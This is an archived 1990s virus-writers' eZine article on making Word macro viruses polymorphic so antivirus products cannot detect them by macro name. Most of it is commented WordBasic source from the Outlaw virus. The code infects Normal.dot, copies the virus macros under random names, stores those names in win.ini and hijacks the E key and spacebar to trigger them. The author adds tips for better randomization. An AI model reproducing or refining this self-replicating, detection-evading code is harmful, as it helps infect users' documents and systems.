Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM.004: Polymorphism in macro virii

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

POLYFORMISM IN MACRO VIRII

If you don't know what polymorfism is: it's a sort of encryption of a virus, but one that changes the encryption routine every infection.

I hope you got it now, but if you don't I'll say it again:"I'm not an english teacher so fuck it if you can't follow me."

The above description of polymorfism is mainly mend for dos (assembler) virii. With macro virii it is a bit different.
As you probably know a macro virii contains macros (duh...) and as you probably know, those macros have names (duh...). Several AV products look for those names to identify if a file is infected. So the only thing that is to be done is create different names every infection. That's easier said then done, believe me.

The very first polymorfic macro virus created was the Outlaw virus.
It was created by the Nightmare Joker from SLAM. The Outlaw source for creating random macro names is put down here. I think it's quite complicated so I give a full explanation of it beside the source.
For the complete Outlaw virus see "macro viruses".

'This is the macro that infects the Normal.dot 

---------------------------------------------------------------- 
Sub MAIN 
On Error Goto Done                      'Error handler. 

A$ = FileName$()                        'A$ = active filename. 
If A$ = "" Then Goto Finish             'If no file active goto finish. 

If CheckInstalled = 0 Then              'Already installed?... 
	Routine                         'No then goto Sub Routine, 
	Crypt                           'Sub Crypt, Sub PayLoadMakro, 
	PayloadMakro                    'etc. 
	FileSaveAll 1, 1 
Else                                    'Yes (already installed). 
	Goto Done                       'Goto done. 
End If 

Done:                                   'Done (already installed). 
A$ = FileName$()                        'A$ = active filename. 
If A$ = "" Then                         'If no file active goto finish. 
	Goto Finish 
Else                                    'If a file is active, 
	Insert " "                      'insert a "space", for infecting 
					'the active file. 
End If 

 
Finish:                                 'Finish (no file active). 
End Sub 

Sub Crypt                               'The Sub Crypt. 
One = 7369                              'Number one is 7369. 
Two = 9291                              'Number two is 9291. 
Num = Int(Rnd() * (Two - One) + One)    'generate random number. 
A$ = Str$(Num)                          'A$ is generated number. 
A$ = LTrim$(A$)                         'Delete the empty space before... 
					'the number. The empty space is... 
					'for making the number negative, 
					'e.g. -7369. 

Beginn = Hour(Now())                    'Beginn is the active hour. 
B$ = Str$(Beginn)                       'B$ is the active hour (string). 
B$ = LTrim$(B$)                         'Delete the empty space in B$. 

If B$ = "1" Then C$ = "A"               'If B$ is 1 (1 o'clock)... 
					'then C$ is A. 
If B$ = "2" Then C$ = "B"               'If B$ is 2 (2 o'clock)... 
					'then C$ is B. 
If B$ = "3" Then C$ = "C"               'If B$ is 3 (3 o'clock)... 
					'then C$ is C. 
If B$ = "4" Then C$ = "D"               'Etc. 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

E$ = C$ + A$                            'E$ is C$ (character) plus... 
					'A$ (the generated number). 
ZU$ = GetDocumentVar$("VirNameDoc")     'ZU$ is macro called VirNameDoc... 
					'Watch out:VirNameDoc is not... 
					'the real macro name, it's some... 
					'sort of string. 
PG$ = WindowName$() + ":" + ZU$         'PG$ is active filename plus... 
					'":" and plus macro name (ZU$). 
MacroCopy PG$, "Global:" + E$           'Copies macro from document... 
					'to global template, with... 
					'the name that was generated. 
SetProfileString "Intl", "Name2", E$    'Set the macro name in... 
					'win.ini. as "Intl", "Name2", E$. 
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0 
					'Creates short-cut with the... 
					'ascii keycode 69 (E). If the... 
					'E key is pushed the macro... 
					'E$ will be executed (The above... 
					'macro). With the .Add you tell... 
					'Word that you want to add that... 
					'function to the key not replace... 
					'it. 

End Sub                                 'End the Sub Crypt 

 

Sub Routine                             'Begin Sub Routine 
One = 7369                              'This is practically... 
Two = 9291                              'the same as Sub Crypt. 
Num = Int(Rnd() * (Two - One) + One)    'I will only explain the... 
A$ = Str$(Num)                          'things that aren't... 
A$ = LTrim$(A$)                         'explained above. 

Beginn = Hour(Now()) 
B$ = Str$(Beginn) 
B$ = LTrim$(B$) 

If B$ = "1" Then C$ = "A" 
If B$ = "2" Then C$ = "B" 
If B$ = "3" Then C$ = "C" 
If B$ = "4" Then C$ = "D" 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

D$ = C$ + A$                            'The same as in Sub Crypt... 
UZ$ = GetDocumentVar$("VirName")        'only with other names. 
GP$ = WindowName$() + ":" + UZ$ 
MacroCopy GP$, "Global:" + D$ 
SetProfileString "Intl", "Name", D$ 
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0 
					'This one creates a short-cut... 
					'with the D$ macro (this macro)... 
					'if the spacebar (keycode 32)... 
					'is pushed. 

End Sub 

Sub PayloadMakro                        'Same again. 
One = 7369 
Two = 9291 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$) 

Beginn = Hour(Now()) 
B$ = Str$(Beginn) 
B$ = LTrim$(B$) 

If B$ = "1" Then C$ = "A" 
If B$ = "2" Then C$ = "B" 
If B$ = "3" Then C$ = "C" 
If B$ = "4" Then C$ = "D" 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

K$ = C$ + A$                            'Again another name. 
ZUZ$ = GetDocumentVar$("VirNamePayload") 
GP$ = WindowName$() + ":" + ZUZ$ 
MacroCopy GP$, "Global:" + K$ 
SetProfileString "Intl", "Name3", K$    'Only this time no... 
					'short-cut because this... 
					'is the payloadmacro and... 
					'this payload macro is only... 
					'executed on a special date... 
					'that is programmed in... 
					'another macro. For the... 
					'whole Outlaw virus, see... 
					'the virii section. 
End Sub 

Function CheckInstalled                 'A function to check if... 
					'the virus already installed... 
					'the global template (Normal.Dot). 
CC$ = GetProfileString$("Intl", "Name") 'CC$ is the name of the Routine... 
					'macro (Sub Routine). 
    CheckInstalled = 0                  'Set the var checkinstalled to 0. 
    If CountMacros(0) > 0 Then          'If the number of macros in... 
					'Normal.Dot is greater then 0, 
	For i = 1 To CountMacros(0)     'then create a for...next loop... 
					'that loops the number of macros. 
	    If MacroName$(i, 0) = CC$ Then    'If the macro name in... 
		CheckInstalled = 1      'Normal.dot is CC$ (routine... 
					'macro) then set var... 
					'CheckInstalled to 1. 
	    End If                      'Ends the If instruction. 
	Next i                          'All macros done? then... 
					'continue. Else go back to... 
					'for...next loop. 
    End If                              'Ends the If instruction. 
End Function                            'The end of the function. 
----------------------------------------------------------------


This is one macro from the Outlaw virus. To get the names of the macros, to use them in other macros, just use: 

CC$ = GetProfileString$("Intl", "Name")


CC$ can be any string name you want but make sure to use the right name you gave to the macro, in this example "Intl" and "Name".

Viewture & Optimization

A thing that could happen with the way this polymorphic name is generated is that you get 2 same names, OK it's obvious that it won't happen often but you never know. To correct this problem you can use the following code: 

Sub Crypt 
One = 1 
Two = 1000 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$) 

------------------------- 

Sub Routine 
One = 1001 
Two = 2000 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$)


And so on...


As you see I used different numbers so ou couldn't get a same name. You can also use different characters for the first letter.


Another thing is, that the virus checks for the time to generate the first letter. It could be better to randomly generate the first letter. That is fixed easily, just create a second random number generator that generates a number between 1 and 24.


And for the future......


--- Neophyte --- and some help from NJ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
24 Nov 2024
Hi, I noticed a few problems with your website. Is this a good place to send them them? Have an awesome day, Martin
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT